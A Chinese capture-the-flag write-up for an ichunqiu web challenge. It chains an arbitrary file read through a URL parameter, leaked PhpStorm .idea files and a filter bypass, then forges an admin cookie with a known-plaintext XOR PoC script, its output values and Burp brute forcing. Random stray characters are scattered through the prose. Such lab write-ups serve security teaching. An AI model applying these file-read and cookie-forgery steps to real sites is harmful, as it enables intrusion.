題目內容：考腦洞，你能過么？
打開是一張圖片，url為game.ichunqiu.com/index.php?jpg=hei.jpg
分值：50分 類型：Web

查看網頁源代碼
<title>file:hei.jpg</title><img src='data:image/gif;base64,/9j/……
注意<img src='data:image/gif;base64炫彩，圖片使用base64編碼。
將base64,后面的內容用base64解碼絮短，得到亂碼（因為是圖片文件）江兢。

注意game.ichunqiu.com/index.php?jpg=hei.jpg
修改參數(shù)，嘗試 ?jpg=index.php
查看網頁源代碼

<title>file:index.php</title><img src='data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg=='></img>

將base64,后面的內容用base64解碼丁频，得到php文件

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg'); //0s后跳轉url
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);//搜索$file杉允，只能是字母和數(shù)字，否則被替換為空席里。^是除了……以外的字符叔磷。
$file = str_replace("config","_", $file);//搜索$file，將config替換為空
$txt = base64_encode(file_get_contents($file));//對文件內容用base64編碼

echo "<img src='data:image/gif;base64,".$txt."'></img>";

/*
 * Can you find the flag file?
 *
 */

?>

注意* Created by PhpStorm.（這居然是重點＝贝拧）
百度PhpStorm改基，發(fā)現(xiàn)官網 https://www.jetbrains.com/phpstorm/，從官網下載安裝包安裝PhpStorm咖为，安裝完成后秕狰，新建new project，可以看到new project存儲的位置新建了一個文件夾.idea躁染，.idea中有文件夾inspectionProfiles（空）鸣哀，文件misc.xml，modules.xml吞彤，untitled.iml我衬，workspace.xml。

/.idea和/.idea/untitled.iml無法訪問

/.idea/misc.xml得到

<project version="4">
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="添加"/>
<OptionsSetting value="true" id="移除"/>
<OptionsSetting value="true" id="簽出"/>
<OptionsSetting value="true" id="更新"/>
<OptionsSetting value="true" id="狀態(tài)"/>
<OptionsSetting value="true" id="編輯"/>
<ConfirmationsSetting value="0" id="添加"/>
<ConfirmationsSetting value="0" id="移除"/>
</component>
</project>

/.idea/modules.xml饰恕，得到

<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/phpctf.iml" filepath="$PROJECT_DIR$/.idea/phpctf.iml"/>
</modules>
</component>
</project>

/.idea/workspace.xml挠羔，得到

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<project version="4">
<component name="ChangeListManager">
<list default="true" id="4738030a-3c9f-45c6-8d23-a762415abc27" name="默認的" comment=""/>
<ignored path="phpctf.iws"/>
<ignored path=".idea/workspace.xml"/>
<ignored path=".idea/dataSources.local.xml"/>
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
<option name="TRACKING_ENABLED" value="true"/>
<option name="SHOW_DIALOG" value="false"/>
<option name="HIGHLIGHT_CONFLICTS" value="true"/>
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false"/>
<option name="LAST_RESOLUTION" value="IGNORE"/>
</component>
<component name="ChangesViewManager" flattened_view="true" show_ignored="false"/>
<component name="CreatePatchCommitExecutor">
<option name="PATCH_PATH" value=""/>
</component>
<component name="ExecutionTargetManager" SELECTED_TARGET="default_target"/>
<component name="FavoritesManager">
<favorites_list name="phpctf"/>
</component>
<component name="FileEditorManager">
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
<file leaf-file-name="fl3g_ichuqiu.php" pinned="false" current-in-tab="false">//注意fl3g_ichuqiu.php
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-4.071429">
<caret line="6" column="3" selection-start-line="6" selection-start-column="3" selection-end-line="6" selection-end-column="3"/>
<folding/>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="config.php" pinned="false" current-in-tab="false">//注意config.php
<entry file="file://$PROJECT_DIR$/config.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-6.107143">
<caret line="9" column="2" selection-start-line="9" selection-start-column="2" selection-end-line="9" selection-end-column="2"/>
<folding/>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="index.php" pinned="false" current-in-tab="true">//注意index.php
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.35359803">
<caret line="15" column="30" selection-start-line="15" selection-start-column="30" selection-end-line="15" selection-end-column="30"/>
<folding/>
</state>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/x.php"/>//注意x.php
<option value="$PROJECT_DIR$/config.php"/>
<option value="$PROJECT_DIR$/fl3g_ichuqiu.php"/>
</list>
</option>
</component>
<component name="JsBuildToolGruntFileManager" detection-done="true"/>
<component name="JsBuildToolPackageJson" detection-done="true"/>
<component name="JsGulpfileManager">
<detection-done>true</detection-done>
</component>
<component name="PhpServers">
<servers/>
</component>
<component name="PhpWorkspaceProjectConfiguration" backward_compatibility_performed="true"/>
<component name="ProjectFrameBounds">
<option name="x" value="242"/>
<option name="y" value="21"/>
<option name="width" value="1400"/>
<option name="height" value="1000"/>
</component>
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="添加"/>
<OptionsSetting value="true" id="移除"/>
<OptionsSetting value="true" id="簽出"/>
<OptionsSetting value="true" id="更新"/>
<OptionsSetting value="true" id="狀態(tài)"/>
<OptionsSetting value="true" id="編輯"/>
<ConfirmationsSetting value="0" id="添加"/>
<ConfirmationsSetting value="0" id="移除"/>
</component>
<component name="ProjectView">
<navigator proportions="" version="1">
<flattenPackages/>
<showMembers/>
<showModules/>
<showLibraryContents/>
<hideEmptyPackages/>
<abbreviatePackageNames/>
<autoscrollToSource/>
<autoscrollFromSource/>
<sortByType/>
<manualOrder/>
<foldersAlwaysOnTop value="true"/>
</navigator>
<panes/>
</component>
<component name="PropertiesComponent">
<property name="WebServerToolWindowFactoryState" value="false"/>
<property name="settings.editor.selected.configurable" value="fileTemplates"/>
<property name="settings.editor.splitter.proportion" value="0.2"/>
</component>
<component name="RunManager" selected="JavaScript Debug.fl3g_ichuqiu.php">
<configuration default="false" name="fl3g_ichuqiu.php" type="JavascriptDebugType" factoryName="JavaScript Debug" temporary="true" nameIsGenerated="true" uri="http://localhost:63342/phpctf/fl3g_ichuqiu.php">
<method/>
</configuration>
<configuration default="true" type="JavascriptDebugType" factoryName="JavaScript Debug">
<method/>
</configuration>
<configuration default="true" type="PHPUnitRunConfigurationType" factoryName="PHPUnit">
<TestRunner/>
<method/>
</configuration>
<configuration default="true" type="PhpBehatConfigurationType" factoryName="Behat">
<BehatRunner/>
<method/>
</configuration>
<configuration default="true" type="PhpLocalRunConfigurationType" factoryName="PHP Console">
<method/>
</configuration>
<configuration default="true" type="js.build_tools.gulp" factoryName="Gulp.js">
<node-options/>
<gulpfile/>
<tasks/>
<arguments/>
<envs/>
<method/>
</configuration>
<configuration default="true" type="js.build_tools.npm" factoryName="npm">
<command value="run-script"/>
<scripts/>
<envs/>
<method/>
</configuration>
<list size="1">
<item index="0" class="java.lang.String" itemvalue="JavaScript Debug.fl3g_ichuqiu.php"/>
</list>
<recent_temporary>
<list size="1">
<item index="0" class="java.lang.String" itemvalue="JavaScript Debug.fl3g_ichuqiu.php"/>
</list>
</recent_temporary>
</component>
<component name="ShelveChangesManager" show_recycled="false"/>
<component name="SvnConfiguration">
<configuration/>
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="4738030a-3c9f-45c6-8d23-a762415abc27" name="默認的" comment=""/>
<created>1447597471149</created>
<option name="number" value="Default"/>
<updated>1447597471149</updated>
</task>
<servers/>
</component>
<component name="ToolWindowManager">
<frame x="242" y="21" width="1400" height="1000" extended-state="0"/>
<editor active="false"/>
<layout>
<window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="0" side_tool="false" content_ui="combo"/>
<window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs"/>
<window_info id="版本控制" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs"/>
<window_info id="Event Log" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="true" content_ui="tabs"/>
<window_info id="Database" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs"/>
<window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs"/>
<window_info id="Terminal" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs"/>
<window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="true" content_ui="tabs"/>
<window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs"/>
<window_info id="調試" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs"/>
<window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs"/>
<window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs"/>
<window_info id="Inspection" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="5" side_tool="false" content_ui="tabs"/>
<window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="false" content_ui="tabs"/>
<window_info id="運行" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs"/>
<window_info id="Hierarchy" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="2" side_tool="false" content_ui="combo"/>
<window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs"/>
<window_info id="Ant Build" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs"/>
<window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs"/>
</layout>
</component>
<component name="Vcs.Log.UiProperties">
<option name="RECENTLY_FILTERED_USER_GROUPS">
<collection/>
</option>
<option name="RECENTLY_FILTERED_BRANCH_GROUPS">
<collection/>
</option>
</component>
<component name="VcsContentAnnotationSettings">
<option name="myLimit" value="2678400000"/>
</component>
<component name="XDebuggerManager">
<breakpoint-manager>
<option name="time" value="1"/>
</breakpoint-manager>
<watches-manager/>
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="47" column="19" selection-start-line="47" selection-start-column="19" selection-end-line="47" selection-end-column="19"/>
<folding/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0"/>
<folding/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-4.071429">
<caret line="6" column="3" selection-start-line="6" selection-start-column="3" selection-end-line="6" selection-end-column="3"/>
<folding/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/config.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-6.107143">
<caret line="9" column="2" selection-start-line="9" selection-start-column="2" selection-end-line="9" selection-end-column="2"/>
<folding/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.35359803">
<caret line="15" column="30" selection-start-line="15" selection-start-column="30" selection-end-line="15" selection-end-column="30"/>
<folding/>
</state>
</provider>
</entry>
</component>
</project>

其中提到的PHP文件index.php，fl3g_ichuqiu.php懂盐，config.php褥赊，x.php。x.php在value值中莉恼。config.php中的config會被替換為_拌喉。重點關注fl3g_ichuqiu.php。

?jpg=fl3g_ichuqiu.php俐银，查看源代碼得到
<title>file:fl3g_ichuqiu.php</title><img src='data:image/gif;base64,'></img>
沒有返回數(shù)據(jù)尿背，可能被過濾

?jpg=fl3gconfigichuqiu.php，查看源代碼得到

<title>file:fl3gconfigichuqiu.php</title><img src='data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH5FX05PVElDRSk7DQppbmNsdWRlKCdjb25maWcucGhwJyk7DQpmdW5jdGlvbiByYW5kb20oJGxlbmd0aCwgJGNoYXJzID0gJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Jykgew0KICAgICRoYXNoID0gJyc7DQogICAgJG1heCA9IHN0cmxlbigkY2hhcnMpIC0gMTsNCiAgICBmb3IoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspCXsNCiAgICAgICAgJGhhc2ggLj0gJGNoYXJzW210X3JhbmQoMCwgJG1heCldOw0KICAgIH0NCiAgICByZXR1cm4gJGhhc2g7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJHR4dCwka2V5KXsNCiAgICBmb3IoJGk9MDskaTxzdHJsZW4oJHR4dCk7JGkrKyl7DQogICAgICAgICR0bXAgLj0gY2hyKG9yZCgkdHh0WyRpXSkrMTApOw0KICAgIH0NCiAgICAkdHh0ID0gJHRtcDsNCiAgICAkcm5kPXJhbmRvbSg0KTsNCiAgICAka2V5PW1kNSgkcm5kLiRrZXkpOw0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdHRtcCAuPSAkdHh0WyRpXSBeICRrZXlbKyskc107DQogICAgfQ0KICAgIHJldHVybiBiYXNlNjRfZW5jb2RlKCRybmQuJHR0bXApOw0KfQ0KZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsNCiAgICAkcm5kID0gc3Vic3RyKCR0eHQsMCw0KTsNCiAgICAkdHh0ID0gc3Vic3RyKCR0eHQsNCk7DQogICAgJGtleT1tZDUoJHJuZC4ka2V5KTsNCg0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdG1wIC49ICR0eHRbJGldXiRrZXlbKyskc107DQogICAgfQ0KICAgIGZvcigkaT0wOyRpPHN0cmxlbigkdG1wKTskaSsrKXsNCiAgICAgICAgJHRtcDEgLj0gY2hyKG9yZCgkdG1wWyRpXSktMTApOw0KICAgIH0NCiAgICByZXR1cm4gJHRtcDE7DQp9DQokdXNlcm5hbWUgPSBkZWNyeXB0KCRfQ09PS0lFWyd1c2VyJ10sJGtleSk7DQppZiAoJHVzZXJuYW1lID09ICdzeXN0ZW0nKXsNCiAgICBlY2hvICRmbGFnOw0KfWVsc2V7DQogICAgc2V0Y29va2llKCd1c2VyJyxlbmNyeXB0KCdndWVzdCcsJGtleSkpOw0KICAgIGVjaG8gIuKVrijila/ilr3ilbAp4pWtIjsNCn0NCj8+'></img>

用base64解密

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');//flag可能在config中
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}//產生hash值

function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);//$txt的每個字母的ASCII碼加10再轉回字符
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);//將四位隨機字符+傳入的key并對其進行md5加密生成新的key
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];//異或加密捶惜。$a ^ $b Xor（按位異或） 將把 $a 和 $b 中一個為 1 另一個為 0 的位設為 1田藐。
    }
    return base64_encode($rnd.$ttmp);
}//加密
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);//$txt前4個字符
    $txt = substr($txt,4);//從第5（包含第5）個字符一直到最后
    $key=md5($rnd.$key);

    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}//解密
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));//username不是system，當username=guest時，設置guest和加密的('guest',$key)為Cookie汽久，所以system的Cookie的前5個字母是guest加密
    echo "╮(╯▽╰)╭";
}
?>//獲得Cookie中的user()鹤竭，對user()解密得到username，如果username=system
就打印flag

目的：讓username=system

/fl3g_ichuqiu.php景醇，在web開發(fā)者工具中的存儲看到cookie的user是ZzRIahdLWhxO（每次不一樣）臀稚。
用burpsuite代理得到user的值ZzRIahdLWhxO，帶入下面的POC
PureT寫的POC

<?php
    error_reporting(E_ALL || ~E_NOTICE);

    $text = 'guest';
    $cookie_guest = 'ZzRIahdLWhxO'; //本地cookie
    $cookie_guest = base64_decode($cookie_guest);
    $rnd = substr($cookie_guest,0,4); 
    $cookie_guest = substr($cookie_guest,4);
    for ($i = 0; $i < strlen($text); $i++) {
        $text[$i] = chr(ord($text[$i])+10);
    }

    for ($i = 0; $i < strlen($text); $i++) {
        $key .= ($text[$i] ^ $cookie_guest[$i]);
    }
    $text2 = 'system';
    for ($i = 0; $i < strlen($text2); $i++) {
        $text2[$i] = chr(ord($text2[$i])+10);
    }
    $t = '0123456789abcdef';
    for ($j = 0; $j < strlen($t); $j++) {
        $key_temp = $key.$t[$j];
        $result = '';
        for ($i = 0; $i < strlen($text2); $i++) {
            $result .= ($key_temp[$i] ^ $text2[$i]);
        }
        $result = base64_encode($rnd.$result);
        echo $result."\n";
    }

?>

運行這個php文件（可以用phpstudy）三痰，得到

ZzRIahu3SB9fRw== ZzRIahu3SB9fRg== ZzRIahu3SB9fRQ== ZzRIahu3SB9fRA== ZzRIahu3SB9fQw== ZzRIahu3SB9fQg== ZzRIahu3SB9fQQ== ZzRIahu3SB9fQA== ZzRIahu3SB9fTw== ZzRIahu3SB9fTg== ZzRIahu3SB9fFg== ZzRIahu3SB9fFQ== ZzRIahu3SB9fFA== ZzRIahu3SB9fEw== ZzRIahu3SB9fEg== ZzRIahu3SB9fEQ==  

載入burpsuite爆破吧寺，§ZzRIahdLWhxO§為變量，payload為上面16個值散劫，start attack稚机，查看結果，有一個length不一樣获搏，它的response中的raw中有flag赖条。

參考
https://blog.csdn.net/qq_19876131/article/details/52432140
http://www.reibang.com/p/3d7fb34c28a6
https://www.cnblogs.com/Ragd0ll/p/8818111.html
https://blog.csdn.net/m0_37921080/article/details/79799142
str_replace()、preg_replace()常熙、strtr()三者的區(qū)別和用法